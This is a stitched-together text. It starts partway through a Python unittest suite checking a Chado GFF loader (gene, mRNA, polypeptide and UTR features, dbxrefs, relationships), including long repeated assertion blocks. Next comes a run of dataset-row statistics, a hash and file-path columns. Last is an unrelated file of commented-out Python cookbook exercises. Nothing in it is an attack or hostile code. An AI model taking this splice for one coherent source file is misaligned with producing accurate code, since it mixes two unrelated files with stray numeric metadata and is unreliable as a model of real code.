    assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
    # Check relationships
    # The mRNA must have exactly one parent (the gene), via part_of.
    parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
    assert len(parents) == 1, "mRNA relationships"
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
    derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
    # The polypeptide is attached to the mRNA via derives_from.
    peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
    assert len(peps) == 1, "mRNA relationships, single peptide"
    pep_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=peps[0]) \
        .one()
    # Check pep feature
    pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
    assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
    assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
    assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
    assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
    assert pep_f.residues is None, "gff>pep loaded correctly"
    assert pep_f.seqlen is None, "gff>pep loaded correctly"
    assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
    assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
    assert pep_f.is_analysis is False, "gff>pep loaded correctly"
    assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
    # Check pep loc
    assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
    assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
    # All remaining children of the mRNA (everything but the derives_from pep).
    children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
    assert len(children) == 15, "mRNA relationships, single peptide"
    cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
    exonterm = self.ci.get_cvterm_id('exon', 'sequence')
    utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
    utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
    for c in children:
        assert children[c].type_id == partofterm, "subsubfeatures"
        if children[c].subject.type_id == utr3term:
            # Keep a three_prime_UTR child aside for the detailed checks below.
            subsub_f = children[c].subject
        assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
    # Check a subsubfeature
    assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
    assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
    # UTRs have no ID in the gff: the loader derives name/uniquename from
    # type and location.
    assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.residues is None, "gff>utr loaded correctly"
    assert subsub_f.seqlen is None, "gff>utr loaded correctly"
    assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
    assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
    assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
    assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
    assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
    # Check utr with 2 parents
    confused_child_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='an_utr_with_two_parents') \
        .all()
    assert len(confused_child_f) == 1, "1 utr with 2 parents"
    confused_rels = confused_child_f[0].subject_in_relationships
    assert len(confused_rels) == 2, "1 utr with 2 parents"
    for r in confused_rels:
        assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
    # Check Derives_from
    derivesfrom = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='some_special_cds') \
        .all()
    assert len(derivesfrom) == 1, "derives_from"
    derivesfrom_rels = derivesfrom[0].subject_in_relationships
    assert len(derivesfrom_rels) == 2, "derives_from"
    for r in derivesfrom_rels:
        assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
    # Ontology_term attributes become feature_cvterm rows.
    terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
    assert len(terms) == 2, "gff>ontology_term loaded correctly"
    assert '000001' in terms, "gff>ontology_term loaded correctly"
    assert '00002' in terms, "gff>ontology_term loaded correctly"
    assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
    assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
    # Target location
    # A Target attribute yields a second featureloc; ordering of the two
    # locs is not guaranteed, so find the Target one by its fmin.
    assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
    if derivesfrom[0].featureloc_collection[0].fmin == 120:
        checkedloc = 0
    else:
        checkedloc = 1
    assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def test_load_gff_twice_addonly(self):
    """Reloading the same GFF with add_only=True must raise.

    The second load attempts to insert features that already exist, which
    the loader is expected to reject.
    """
    org = self._create_fake_org()
    an_gff = self._create_fake_an('gff')
    # Adding twice the same gff with --add_only should raise some exception
    self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True)
    # Bug fix: the previous version only ran `assert True` inside the
    # except branch, so the test passed silently when NO exception was
    # raised. Track the exception explicitly and assert it occurred.
    raised = False
    try:
        self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True, add_only=True)
    except Exception:
        # Leave the session usable for tearDown after the failed load.
        self.ci.session.rollback()
        raised = True
    assert raised, "loading the same gff twice with add_only should raise"
def test_load_gff_protein_id(self):
    """The protein_id attribute (set on CDS or on mRNA lines) must become
    the uniquename of the derived polypeptide feature."""
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
    self.ci.feature.load_gff(gff="./test-data/ncbi.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], protein_id_attr="protein_id", no_seq_compute=True)
    derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')

    def _pep_of(rna_uname, rna_name):
        # Fetch an mRNA, sanity-check it, and return its single
        # derives_from polypeptide.
        rna = self.ci.session.query(self.ci.model.feature) \
            .filter_by(uniquename=rna_uname) \
            .one()
        assert rna.name == rna_name
        assert rna.uniquename == rna_uname
        pep_ids = [rel.subject_id for rel in rna.object_in_relationships if rel.type_id == derivesfromterm]
        assert len(pep_ids) == 1
        return self.ci.session.query(self.ci.model.feature) \
            .filter_by(feature_id=pep_ids[0]) \
            .one()

    # CDS level protein_id
    pep = _pep_of("rna1537", 'XM_008184899.2')
    assert pep.name == "XM_008184899.2"
    assert pep.uniquename == "XP_008183121.1"
    # mRNA level protein_id
    pep = _pep_of("rna1539", 'XM_008184894.2')
    assert pep.name == "XM_008184894.2"
    assert pep.uniquename == "some_prot_id"
def test_load_gff_nosource(self):
    """Load a GFF whose lines have no source column.

    Same checks as the add_only test, except that no 'GFF_source' dbxref
    is attached to the features (xref counts drop from 3 to 2).
    """
    org = self._create_fake_org()
    an = self._create_fake_an()
    an_gff = self._create_fake_an('gff')
    self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
    self.ci.feature.load_gff(gff="./test-data/annot_nosource.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
    # The joins guarantee the gene has at least one loc and one synonym.
    gene_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="orange1.1g015632m.g") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    geneterm = self.ci.get_cvterm_id('gene', 'sequence')
    # Check gene feature
    assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
    assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
    assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
    assert gene_f.residues is None, "gff>gene loaded correctly"
    assert gene_f.seqlen is None, "gff>gene loaded correctly"
    # md5 of the empty string: no residues were computed (no_seq_compute).
    assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
    assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
    assert gene_f.is_analysis is False, "gff>gene loaded correctly"
    assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
    # Check gene loc
    assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
    assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
    src_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
        .one()
    assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
    # Remember the landmark id: mRNA and pep must be located on it too.
    scaff1_id = src_f.feature_id
    # Check gene aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>gene aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
    assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
    # Check gene dbxref
    dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
        .filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
    for db in dbs:
        if db.name == "FOOBAR":
            # FOOBAR did not pre-exist: the loader must have created it.
            assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
    dbs = {db.name: db.db_id for db in dbs}
    assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
    # Only 2 xrefs here: no source column => no GFF_source xref.
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
    assert len(xrefs) == 2, "gff>gene dbxrefs loaded correctly"
    assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
    assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
    assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
    # Check gene featureprop
    # Expected props encoded as name___value___rank; each must occur once.
    expected = [
        'Gap___BLABLA___0',
        'Gap___BLOBLO___1',
        'Note___that\'s fantastic___0',
        'Note___really___1',
        'Poutrelle___test___1',
        'Poutrelle___lapinou___0',
    ]
    assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
    for prop in gene_f.featureprop_collection:
        assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
        # Remove as we go so duplicates would be caught.
        expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
    # Check mrna
    rna_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename="PAC:18136219") \
        .join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
        .join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
        .one()
    rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
    # Check mRNA feature
    assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
    assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
    assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
    assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
    assert rna_f.residues is None, "gff>mRNA loaded correctly"
    assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
    assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
    assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
    assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
    assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
    # Check mRNA loc
    assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
    assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
    assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
    # Check mRNA aliases
    exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
    syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
    assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
    assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
    assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
    # Check mRNA dbxref
    # Again only 2 xrefs: no GFF_source without a source column.
    xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
    assert len(xrefs) == 2, "gff>mRNA dbxrefs loaded correctly"
    assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
    assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
    # Check relationships
    # The mRNA must have exactly one parent (the gene), via part_of.
    parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
    assert len(parents) == 1, "mRNA relationships"
    partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
    assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
    derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
    # The polypeptide is attached to the mRNA via derives_from.
    peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
    assert len(peps) == 1, "mRNA relationships, single peptide"
    pep_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(feature_id=peps[0]) \
        .one()
    # Check pep feature
    pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
    assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
    assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
    assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
    assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
    assert pep_f.residues is None, "gff>pep loaded correctly"
    assert pep_f.seqlen is None, "gff>pep loaded correctly"
    assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
    assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
    assert pep_f.is_analysis is False, "gff>pep loaded correctly"
    assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
    # Check pep loc
    assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
    assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
    assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
    # All remaining children of the mRNA (everything but the derives_from pep).
    children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
    assert len(children) == 15, "mRNA relationships, single peptide"
    cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
    exonterm = self.ci.get_cvterm_id('exon', 'sequence')
    utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
    utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
    for c in children:
        assert children[c].type_id == partofterm, "subsubfeatures"
        if children[c].subject.type_id == utr3term:
            # Keep a three_prime_UTR child aside for the detailed checks below.
            subsub_f = children[c].subject
        assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
    # Check a subsubfeature
    assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
    assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
    # UTRs have no ID in the gff: the loader derives name/uniquename from
    # type and location.
    assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
    assert subsub_f.residues is None, "gff>utr loaded correctly"
    assert subsub_f.seqlen is None, "gff>utr loaded correctly"
    assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
    assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
    assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
    assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
    assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmin == 4061905, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].fmax == 4062210, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmin_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].is_fmax_partial is False, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].strand == 1, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].phase is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].residue_info is None, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].locgroup == 0, "gff>utr located correctly"
    assert subsub_f.featureloc_collection[0].rank == 0, "gff>utr located correctly"
    # Check utr with 2 parents
    confused_child_f = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='an_utr_with_two_parents') \
        .all()
    assert len(confused_child_f) == 1, "1 utr with 2 parents"
    confused_rels = confused_child_f[0].subject_in_relationships
    assert len(confused_rels) == 2, "1 utr with 2 parents"
    for r in confused_rels:
        assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
    # Check Derives_from
    derivesfrom = self.ci.session.query(self.ci.model.feature) \
        .filter_by(uniquename='some_special_cds') \
        .all()
    assert len(derivesfrom) == 1, "derives_from"
    derivesfrom_rels = derivesfrom[0].subject_in_relationships
    assert len(derivesfrom_rels) == 2, "derives_from"
    for r in derivesfrom_rels:
        assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
    # Ontology_term attributes become feature_cvterm rows.
    terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
    assert len(terms) == 2, "gff>ontology_term loaded correctly"
    assert '000001' in terms, "gff>ontology_term loaded correctly"
    assert '00002' in terms, "gff>ontology_term loaded correctly"
    assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
    assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
    # Target location
    # A Target attribute yields a second featureloc; ordering of the two
    # locs is not guaranteed, so find the Target one by its fmin.
    assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
    if derivesfrom[0].featureloc_collection[0].fmin == 120:
        checkedloc = 0
    else:
        checkedloc = 1
    assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
    assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def setUp(self):
    """Reset the test database to a clean state before each test."""
    self.ci = ci
    # Wipe organisms, analyses and features first, then the dbxref rows
    # they referenced (not covered by the deletions above), then commit.
    for wipe in (
        self.ci.organism.delete_organisms,
        self.ci.analysis.delete_analyses,
        self.ci.feature.delete_features,
        self._del_dbxref,
    ):
        wipe()
    self.ci.session.commit()
def tearDown(self):
    """Remove all data created by the test, mirroring setUp's cleanup."""
    chado = self.ci
    chado.organism.delete_organisms()
    chado.analysis.delete_analyses()
    chado.feature.delete_features()
    # dbxref rows are not removed by the feature deletion above
    self._del_dbxref()
    chado.session.commit()
| 57.888278
| 224
| 0.686019
| 12,675
| 94,821
| 4.9357
| 0.027219
| 0.119405
| 0.107081
| 0.066113
| 0.968063
| 0.964067
| 0.957896
| 0.955163
| 0.94976
| 0.934703
| 0
| 0.03669
| 0.200915
| 94,821
| 1,637
| 225
| 57.923641
| 0.788967
| 0.026123
| 0
| 0.882158
| 0
| 0.046473
| 0.276672
| 0.029892
| 0
| 0
| 0
| 0
| 0.564315
| 1
| 0.017427
| false
| 0
| 0.00166
| 0
| 0.019917
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dc0dbb9039c841f1dfc7ec952a49857bc2478422
| 11,301
|
py
|
Python
|
cookbook/dt-and-al.py
|
ianzhengnan/learnpy
|
ed1736ac976d56253183399466a167fb9319f869
|
[
"Apache-2.0"
] | 1
|
2017-06-12T03:12:29.000Z
|
2017-06-12T03:12:29.000Z
|
cookbook/dt-and-al.py
|
ianzhengnan/learnpy
|
ed1736ac976d56253183399466a167fb9319f869
|
[
"Apache-2.0"
] | null | null | null |
cookbook/dt-and-al.py
|
ianzhengnan/learnpy
|
ed1736ac976d56253183399466a167fb9319f869
|
[
"Apache-2.0"
] | null | null | null |
# Python cookbook exercises: data structures and algorithms.
# NOTE: this file contained an unresolved git merge conflict whose two sides
# were byte-identical; resolved by keeping a single copy and dropping the
# conflict markers. Earlier exercises are kept commented out for reference.
# records = [
# ('foo', 1,2),
# ('bar', 'hello'),
# ('foo', 3,4)
# ]
# def do_foo(x, y):
# print('foo', x, y)
# def do_bar(s):
# print('bar', s)
# for tag, *args in records:
# if tag == 'foo':
# do_foo(*args)
# elif tag == 'bar':
# do_bar(*args)
# #---------------------------------------------------------------------------------------------
# from collections import deque
# def search(lines, pattern, history=5):
# previous_lines = deque(maxlen=history)
# for line in lines:
# if pattern in line:
# # return main function if pattern is matched
# yield line, previous_lines
# previous_lines.append(line)
# if __name__ == '__main__':
# with open('test.txt') as f:
# for line, prevlines in search(f, 'python', 5):
# # print previous lines
# for pline in prevlines:
# print(pline, end='')
# # print current line
# print(line, end='')
# # print 20 '-' for separate
# print('-'*20)
#---------------------------------------------------------------------------------------------
# from collections import defaultdict
# d = defaultdict(list)
# d['a'].append(1)
# d['a'].append(2)
# d['b'].append(3)
# print(list(d.items()))
#---------------------------------------------------------------------------------------------
# from collections import OrderedDict
# d1 = dict()
# d1['foo'] = 1
# d1['bar'] = 2
# d1['spam'] = 3
# d1['grok'] = 4
# print(d1)
# d2 = OrderedDict()
# d2['foo'] = 1
# d2['bar'] = 2
# d2['spam'] = 3
# d2['grok'] = 4
# print(d2)
#---------------------------------------------------------------------------------------------
# prices = {
# 'ACME': 45.23,
# 'AAPL': 612.78,
# 'IBM' : 205.55,
# 'HPQ' : 37.2,
# 'FB' : 10.75
# }
# min_price = min(zip(prices.values(), prices.keys()))
# print(min_price)
# max_price = max(zip(prices.values(), prices.keys()))
# print(max_price)
# prices_sorted = sorted(zip(prices.values(), prices.keys()))
# print(prices_sorted)
#---------------------------------------------------------------------------------------------
# a = {
# 'x': 1,
# 'y': 2,
# 'z': 3
# }
# b = {
# 'w': 10,
# 'x': 3,
# 'y': 2
# }
# print(a.keys() & b.keys())
# print(a.keys() - b.keys())
# print(a.items() & b.items())
#---------------------------------------------------------------------------------------------
# items = [0,1,2,3,5,7,8,9]
# a = slice(2,4)
# print(items[a]) # [2,3]
# items[a] = [10, 11]
# print(items) #[0,1,10,11,5,7,8,9]
# del items[a]
# print(items) #[0,1,5,7,8,9]
#---------------------------------------------------------------------------------------------
# words = [
# 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',
# 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',
# 'eyes', "don't", 'look', 'around', 'the', 'eyes', 'look', 'into',
# 'my', 'eyes', "you're", 'under'
# ]
# from collections import Counter
# word_counts = Counter(words)
# top_three = word_counts.most_common(3)
# print(top_three)
#---------------------------------------------------------------------------------------------
# from operator import itemgetter
# rows = [
# {'fname': 'Brian', 'lname': 'Jones', 'uid': 1003},
# {'fname': 'David', 'lname': 'Beazley', 'uid': 1002},
# {'fname': 'John', 'lname': 'Cleese', 'uid': 1001},
# {'fname': 'Big', 'lname': 'Jones', 'uid': 1004}
# ]
# row_by_fname = sorted(rows, key=itemgetter('fname'))
# print(row_by_fname)
# row_by_lname = sorted(rows, key=itemgetter('lname'))
# print(row_by_lname)
# row_by_lfname = sorted(rows, key=itemgetter('fname', 'lname'))
# print(row_by_lfname)
# print(min(rows, key=itemgetter('uid')))
# print(max(rows, key=itemgetter('uid')))
